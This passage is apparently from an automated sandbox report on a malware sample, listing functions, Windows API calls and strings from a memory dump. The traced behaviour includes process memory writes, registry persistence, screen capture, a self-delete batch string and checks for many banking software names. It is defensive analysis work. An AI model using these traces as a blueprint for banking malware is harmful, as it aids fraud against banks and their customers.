SetSecurityDescriptorSacl.ADVAPI32(02842980,?,00000001,?), ref: 028335F5
LocalFree.KERNEL32(?), ref: 02833607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 028335C0

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 028104EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 028104FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 02810530
memset.MSVCRT ref: 02810570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 02810581
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 028105C1
memset.MSVCRT ref: 0281062C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028109C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 028109D3

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

Part of subcall function 0281043B: memset.MSVCRT ref: 028104EB
Part of subcall function 0281043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028104FC
Part of subcall function 0281043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 02810530
Part of subcall function 0281043B: memset.MSVCRT ref: 02810570
Part of subcall function 0281043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02810581
Part of subcall function 0281043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 028105C1
Part of subcall function 0281043B: memset.MSVCRT ref: 0281062C

Part of subcall function 02809BA9: SetLastError.KERNEL32(0000000D), ref: 02809BE4

memcpy.MSVCRT ref: 02810B42
memset.MSVCRT ref: 02810BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 02810BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 02810BC7

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02810643: memset.MSVCRT ref: 02810654

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282582C, Relevance: 9.2, APIs: 3, Strings: 1, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(02843510,?,?,?,0281E9BA), ref: 02825842
LeaveCriticalSection.KERNEL32(02843510,?,?,?,0281E9BA), ref: 02825868

Part of subcall function 0282575A: memset.MSVCRT ref: 02825774
Part of subcall function 0282575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 028257BA

CreateMutexW.KERNEL32(02842974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 0282587A

Part of subcall function 02812F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 02812F37
Part of subcall function 02812F31: CloseHandle.KERNEL32 ref: 02812F49

Strings

Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 0282586F

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 028327C1: socket.WS2_32(?,?,00000006), ref: 028327F5

bind.WS2_32(?,02832CD1), ref: 02832C3A
listen.WS2_32(?,00000014), ref: 02832C4F
WSAGetLastError.WS2_32(00000000,?,02832CD1,?,?,?,?,00000000), ref: 02832C5D

Part of subcall function 02832968: shutdown.WS2_32(?,00000002), ref: 02832976
Part of subcall function 02832968: closesocket.WS2_32(?), ref: 0283297F
Part of subcall function 02832968: WSACloseEvent.WS2_32(?), ref: 02832992

WSASetLastError.WS2_32(?,?,02832CD1,?,?,?,?,00000000), ref: 02832C6D

Part of subcall function 02832917: WSACreateEvent.WS2_32(00000000,?,02832C15,?,00000000,?,02832CD1,?,?,?,?,00000000), ref: 0283292D
Part of subcall function 02832917: WSAEventSelect.WS2_32(?,?,02832CD1), ref: 02832943
Part of subcall function 02832917: WSACloseEvent.WS2_32(?), ref: 02832957

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(02991E90,00000000,?,?,?,?,028248EB,?,?,00000000), ref: 02811913

Part of subcall function 02813764: GetModuleHandleW.KERNEL32(?), ref: 02813780
Part of subcall function 02813764: GetModuleHandleW.KERNEL32(?), ref: 028137BB

GetFileVersionInfoSizeW.VERSION(02991EF0,?,?,?,?,?,028248EB,?,?,00000000), ref: 02811933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 02811953

Part of subcall function 02834D77: GetCommandLineW.KERNEL32 ref: 02834E01
Part of subcall function 02834D77: CommandLineToArgvW.SHELL32 ref: 02834E08
Part of subcall function 02834D77: LocalFree.KERNEL32 ref: 02834E48
Part of subcall function 02834D77: GetModuleHandleW.KERNEL32(?), ref: 02834E8A

Part of subcall function 0280BBAD: VerQueryValueW.VERSION(?,028075E4,?,?,02991E90,?,02811983,?,?,?,?,?,?,028248EB), ref: 0280BBCE
Part of subcall function 0280BBAD: GetModuleHandleW.KERNEL32(?), ref: 0280BC0F

Part of subcall function 0281D8C0: GetModuleHandleW.KERNEL32(?), ref: 0281D8DD

Part of subcall function 0280E2C1: EnterCriticalSection.KERNEL32(02843510,02991E90,0281198D,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 0280E2D1
Part of subcall function 0280E2C1: LeaveCriticalSection.KERNEL32(02843510,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 0280E2F9

Part of subcall function 0280D987: InitializeCriticalSection.KERNEL32 ref: 0280D9B5
Part of subcall function 0280D987: GetModuleHandleW.KERNEL32(?), ref: 0280DA1C

Part of subcall function 0280E209: InitializeCriticalSection.KERNEL32 ref: 0280E21E

Part of subcall function 0281599B: EnterCriticalSection.KERNEL32(028427DC,00000000,0280D9CE,02991E90,?,?,?,02811992,?,?,?,?,028248EB,?,?,00000000), ref: 028159A7
Part of subcall function 0281599B: LeaveCriticalSection.KERNEL32(028427DC,?,?,?,02811992,?,?,?,?,028248EB,?,?,00000000), ref: 028159B7

Part of subcall function 028159C5: LeaveCriticalSection.KERNEL32(028427DC,02815A45,00000002,?,?,?,0280DAA2,00000002,00000001,000000FF), ref: 028159CF

Part of subcall function 028159D6: LeaveCriticalSection.KERNEL32(028427DC,?,0280D9F7,00000009,02991E90,?,?,?,02811992,?,?,?,?,028248EB), ref: 028159E3

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

LeaveCriticalSection.KERNEL32(02991E90,?,?,?,?,028248EB,?,?,00000000), ref: 028119D2

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0281507A
Thread32First.KERNEL32(?,?), ref: 02815095
Thread32Next.KERNEL32(?,?), ref: 028150A8
CloseHandle.KERNEL32 ref: 028150B3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281EA5E, Relevance: 7.2, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 0281EA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 0281EA87
TerminateThread.KERNEL32(?,00000000), ref: 0281EA93
CloseHandle.KERNEL32 ref: 0281EA9A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282BE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

Part of subcall function 0282BAD3: memcpy.MSVCRT ref: 0282BAEE
Part of subcall function 0282BAD3: StringFromGUID2.OLE32(?), ref: 0282BB92

CreateMutexW.KERNEL32(02842974,00000001,?), ref: 0282BEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0282BEAC
CloseHandle.KERNEL32 ref: 0282BEBA

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832917, Relevance: 5.8, APIs: 3, Instructions: 30

APIs

WSACreateEvent.WS2_32(00000000,?,02832C15,?,00000000,?,02832CD1,?,?,?,?,00000000), ref: 0283292D
WSAEventSelect.WS2_32(?,?,02832CD1), ref: 02832943
WSACloseEvent.WS2_32(?), ref: 02832957

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028103FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 02810400
VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 02810421
FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 0281042A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816A19, Relevance: 5.6, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

Part of subcall function 0281692C: EnterCriticalSection.KERNEL32(02843510,00000024,0281699F,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 0281693C
Part of subcall function 0281692C: LeaveCriticalSection.KERNEL32(02843510,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 02816966

HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02827011, Relevance: 5.5, APIs: 3, Instructions: 114

APIs

GetVersionExW.KERNEL32(02842FD8), ref: 0282702B
GetNativeSystemInfo.KERNEL32(?), ref: 02827167
memset.MSVCRT ref: 0282719C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028106B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 028106CE
InterlockedCompareExchange.KERNEL32(0284276C), ref: 028106DA
VirtualProtect.KERNEL32(3D920000,00010000,00000040,?), ref: 0281071E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820DB0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 29

APIs

Part of subcall function 02820D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 02820D9C

RegSetValueExW.ADVAPI32(00000000,000000FE,?,00000000,?,?), ref: 02820DE5

Part of subcall function 02820D19: RegFlushKey.ADVAPI32 ref: 02820D29
Part of subcall function 02820D19: RegCloseKey.ADVAPI32 ref: 02820D31

Strings

Software\Microsoft\Yfosteyq, xrefs: 02820DC5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028099B5, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 19

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 028099CD

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 028099C5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281DBC4, Relevance: 3.1, APIs: 2, Instructions: 80

APIs

Part of subcall function 02815A4F: GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51
Part of subcall function 02815A4F: TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
Part of subcall function 02815A4F: TlsSetValue.KERNEL32(00000001), ref: 02815A80
Part of subcall function 02815A4F: SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0281DC28

Part of subcall function 028119E0: EnterCriticalSection.KERNEL32(02991E90), ref: 028119EE
Part of subcall function 028119E0: PathFindFileNameW.SHLWAPI(?), ref: 02811A21
Part of subcall function 028119E0: PathFindFileNameW.SHLWAPI(?), ref: 02811A64
Part of subcall function 028119E0: LeaveCriticalSection.KERNEL32(02991E90), ref: 02811A9E

LdrLoadDll.NTDLL ref: 0281DC99

Part of subcall function 02815AD5: GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
Part of subcall function 02815AD5: TlsSetValue.KERNEL32(00000000), ref: 02815AE6
Part of subcall function 02815AD5: SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281D904, Relevance: 3.1, APIs: 2, Instructions: 79

APIs

Part of subcall function 02815A4F: GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51
Part of subcall function 02815A4F: TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
Part of subcall function 02815A4F: TlsSetValue.KERNEL32(00000001), ref: 02815A80
Part of subcall function 02815A4F: SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018), ref: 0281D93C

Part of subcall function 0282BE5A: CreateMutexW.KERNEL32(02842974,00000001,?), ref: 0282BEA0
Part of subcall function 0282BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0282BEAC
Part of subcall function 0282BE5A: CloseHandle.KERNEL32 ref: 0282BEBA

Part of subcall function 0280FBD5: TlsGetValue.KERNEL32(00000026,?,0281D975), ref: 0280FBDE

Part of subcall function 02824A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824A89
Part of subcall function 02824A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824AC4
Part of subcall function 02824A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B04
Part of subcall function 02824A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B27
Part of subcall function 02824A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 02824B77

CloseHandle.KERNEL32 ref: 0281D9B1

Part of subcall function 0281506A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0281507A
Part of subcall function 0281506A: Thread32First.KERNEL32(?,?), ref: 02815095
Part of subcall function 0281506A: Thread32Next.KERNEL32(?,?), ref: 028150A8
Part of subcall function 0281506A: CloseHandle.KERNEL32 ref: 028150B3

Part of subcall function 02815AD5: GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
Part of subcall function 02815AD5: TlsSetValue.KERNEL32(00000000), ref: 02815AE6
Part of subcall function 02815AD5: SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282BEE3, Relevance: 3.0, APIs: 1, Instructions: 24

APIs

CreateMutexW.KERNEL32(02842974,00000000,?), ref: 0282BF05

Part of subcall function 02812F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 02812F37
Part of subcall function 02812F31: CloseHandle.KERNEL32 ref: 02812F49

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028307B1, Relevance: 2.8, APIs: 1, Instructions: 19

APIs

CoCreateInstance.OLE32(028017F8,00000000,00004401,02801858,?), ref: 028307C6

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820E64, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

Part of subcall function 02820DFC: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 02820E10

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 02820EBF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028327C1, Relevance: 2.1, APIs: 1, Instructions: 36

APIs

socket.WS2_32(?,?,00000006), ref: 028327F5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820D74, Relevance: 2.1, APIs: 1, Instructions: 28

APIs

RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 02820D9C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820F07, Relevance: 2.0, APIs: 1, Instructions: 60

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 02820F2B

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281696E, Relevance: 1.9, APIs: 1, Instructions: 9

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 02816977

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028144AC, Relevance: 1.5, APIs: 1, Instructions: 31

APIs

Part of subcall function 02815A4F: GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51
Part of subcall function 02815A4F: TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
Part of subcall function 02815A4F: TlsSetValue.KERNEL32(00000001), ref: 02815A80
Part of subcall function 02815A4F: SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

Part of subcall function 0280D89E: EnterCriticalSection.KERNEL32 ref: 0280D8A3
Part of subcall function 0280D89E: LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0280D8FB

Part of subcall function 02817E75: EnterCriticalSection.KERNEL32(0299264C,02992638,00000001,?,02992638,0281C026,00000001,?), ref: 02817E8F
Part of subcall function 02817E75: LeaveCriticalSection.KERNEL32(0299264C,?,?,?), ref: 02817EBE

closesocket.WS2_32(?), ref: 028144EF

Part of subcall function 02815AD5: GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
Part of subcall function 02815AD5: TlsSetValue.KERNEL32(00000000), ref: 02815AE6
Part of subcall function 02815AD5: SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832F2B, Relevance: 1.5, APIs: 1, Instructions: 12

APIs

sendto.WS2_32(?,?,?,00000000,?), ref: 02832F42

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Non-executed Functions

Function 0280DBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 0280DBFA
StrStrIW.SHLWAPI(bancline), ref: 0280DC0F
StrStrIW.SHLWAPI(fidelity), ref: 0280DC24
StrStrIW.SHLWAPI(micrsolv), ref: 0280DC39
StrStrIW.SHLWAPI(bankman), ref: 0280DC4E
StrStrIW.SHLWAPI(vantiv), ref: 0280DC63
StrStrIW.SHLWAPI(episys), ref: 0280DC78
StrStrIW.SHLWAPI(jack henry), ref: 0280DC8D
StrStrIW.SHLWAPI(cruisenet), ref: 0280DCA2
StrStrIW.SHLWAPI(gplusmain), ref: 0280DCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 0280DCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 0280DCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 0280DCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 0280DD03
StrStrIW.SHLWAPI(silverlake), ref: 0280DD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 0280DD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 0280DD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 0280DD47
StrStrIW.SHLWAPI(fastdoc), ref: 0280DD58

Strings

tellerplus, xrefs: 0280DBEF
bancline, xrefs: 0280DC04
fidelity, xrefs: 0280DC19
micrsolv, xrefs: 0280DC2E
bankman, xrefs: 0280DC43
vantiv, xrefs: 0280DC58
episys, xrefs: 0280DC6D
jack henry, xrefs: 0280DC82
cruisenet, xrefs: 0280DC97
gplusmain, xrefs: 0280DCAC
launchpadshell.exe, xrefs: 0280DCC1
dirclt32.exe, xrefs: 0280DCD6
wtng.exe, xrefs: 0280DCE7
prologue.exe, xrefs: 0280DCF8
silverlake, xrefs: 0280DD09
pcsws.exe, xrefs: 0280DD1A
v48d0250s1, xrefs: 0280DD2B
fdmaster.exe, xrefs: 0280DD3C
fastdoc, xrefs: 0280DD4D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02814085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 02814097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 028140AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 028140EE
CreateCompatibleDC.GDI32 ref: 028140FF
LoadCursorW.USER32(00000000,00007F00), ref: 02814115
GetIconInfo.USER32(?,?), ref: 02814129
GetCursorPos.USER32(?), ref: 02814138
GetDeviceCaps.GDI32(?,00000008), ref: 0281414F
GetDeviceCaps.GDI32(?,0000000A), ref: 02814158
CreateCompatibleBitmap.GDI32(?,?), ref: 02814164
SelectObject.GDI32 ref: 02814172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 02814193
DrawIcon.USER32(?,?,?,?), ref: 028141C5

Part of subcall function 0281332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 02813341
Part of subcall function 0281332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0281334C

SelectObject.GDI32(?,00000008), ref: 028141E1
DeleteObject.GDI32 ref: 028141E8
DeleteDC.GDI32 ref: 028141EF
DeleteDC.GDI32 ref: 028141F6
FreeLibrary.KERNEL32(?), ref: 02814206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0281421C
FreeLibrary.KERNEL32(?), ref: 02814230

Strings

gdiplus.dll, xrefs: 0281408C
GdiplusStartup, xrefs: 028140A9
DISPLAY, xrefs: 028140E9
GdiplusShutdown, xrefs: 02814216

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816A69, Relevance: 38.6, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02825087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 02811B16: CreateFileW.KERNEL32(02991EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02811B2F
Part of subcall function 02811B16: GetFileSizeEx.KERNEL32(?,?), ref: 02811B42
Part of subcall function 02811B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02811B68
Part of subcall function 02811B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02811B80
Part of subcall function 02811B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811B9E
Part of subcall function 02811B16: CloseHandle.KERNEL32 ref: 02811BA7

CreateMutexW.KERNEL32(02842974,00000001,?), ref: 0282512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,02825452), ref: 0282513D
CloseHandle.KERNEL32 ref: 0282514B
CloseHandle.KERNEL32 ref: 02825229

Part of subcall function 02824BA2: memcpy.MSVCRT ref: 02824BB2

lstrlenW.KERNEL32(?), ref: 028251AD

Part of subcall function 02834181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 028341A1
Part of subcall function 02834181: Process32FirstW.KERNEL32(?,?), ref: 028341C6
Part of subcall function 02834181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 0283421D
Part of subcall function 02834181: CloseHandle.KERNEL32 ref: 0283423B
Part of subcall function 02834181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 02834257
Part of subcall function 02834181: memcmp.MSVCRT ref: 0283426F
Part of subcall function 02834181: CloseHandle.KERNEL32(?), ref: 028342E7
Part of subcall function 02834181: Process32NextW.KERNEL32(?,?), ref: 028342F3
Part of subcall function 02834181: CloseHandle.KERNEL32 ref: 02834306

ExitWindowsEx.USER32(00000014,80000000), ref: 028251DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 02825203
SetEvent.KERNEL32 ref: 02825210
CloseHandle.KERNEL32 ref: 02825217
IsWellKnownSid.ADVAPI32(02991EC0,00000016), ref: 02825279
CreateEventW.KERNEL32(02842974,00000001,00000000,?), ref: 02825348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02825361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02825373
CloseHandle.KERNEL32(00000000), ref: 0282538A
CloseHandle.KERNEL32(?), ref: 02825390
CloseHandle.KERNEL32(?), ref: 02825396

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

Part of subcall function 0281E8A2: VirtualProtect.KERNEL32(02819777,?,00000040,?), ref: 0281E8BA
Part of subcall function 0281E8A2: VirtualProtect.KERNEL32(02819777,?,?,?), ref: 0281E92D

Part of subcall function 0282BAD3: memcpy.MSVCRT ref: 0282BAEE
Part of subcall function 0282BAD3: StringFromGUID2.OLE32(?), ref: 0282BB92

Part of subcall function 028199FA: LoadLibraryW.KERNEL32(?), ref: 02819A1C
Part of subcall function 028199FA: GetProcAddress.KERNEL32(?,?), ref: 02819A40
Part of subcall function 028199FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 02819A78
Part of subcall function 028199FA: lstrlenW.KERNEL32(?), ref: 02819A90
Part of subcall function 028199FA: StrCmpNIW.SHLWAPI(?,?), ref: 02819AA4
Part of subcall function 028199FA: lstrlenW.KERNEL32(?), ref: 02819ABA
Part of subcall function 028199FA: memcpy.MSVCRT ref: 02819AC6
Part of subcall function 028199FA: FreeLibrary.KERNEL32 ref: 02819ADC
Part of subcall function 028199FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 02819B1B
Part of subcall function 028199FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 02819B57
Part of subcall function 028199FA: NetApiBufferFree.NETAPI32(?), ref: 02819C02
Part of subcall function 028199FA: NetApiBufferFree.NETAPI32(00000000), ref: 02819C14
Part of subcall function 028199FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 02819C33

Part of subcall function 02815433: CharToOemW.USER32(02991EF0,?), ref: 02815444

Part of subcall function 0282B0C1: GetCommandLineW.KERNEL32 ref: 0282B0DB
Part of subcall function 0282B0C1: CommandLineToArgvW.SHELL32 ref: 0282B0E2
Part of subcall function 0282B0C1: StrCmpNW.SHLWAPI(?,02807F1C,00000002), ref: 0282B108
Part of subcall function 0282B0C1: LocalFree.KERNEL32 ref: 0282B134
Part of subcall function 0282B0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 0282B171
Part of subcall function 0282B0C1: memcpy.MSVCRT ref: 0282B184
Part of subcall function 0282B0C1: UnmapViewOfFile.KERNEL32 ref: 0282B1BD
Part of subcall function 0282B0C1: memcpy.MSVCRT ref: 0282B1E0
Part of subcall function 0282B0C1: CloseHandle.KERNEL32 ref: 0282B1F9

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0282BEE3: CreateMutexW.KERNEL32(02842974,00000000,?), ref: 0282BF05

Part of subcall function 02819925: memcpy.MSVCRT ref: 0281993C
Part of subcall function 02819925: memcmp.MSVCRT ref: 0281995E
Part of subcall function 02819925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0281998C
Part of subcall function 02819925: lstrcmpiW.KERNEL32(?), ref: 028199DC

Part of subcall function 02811BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811BC6
Part of subcall function 02811BB5: CloseHandle.KERNEL32 ref: 02811BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 02825304

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028199FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

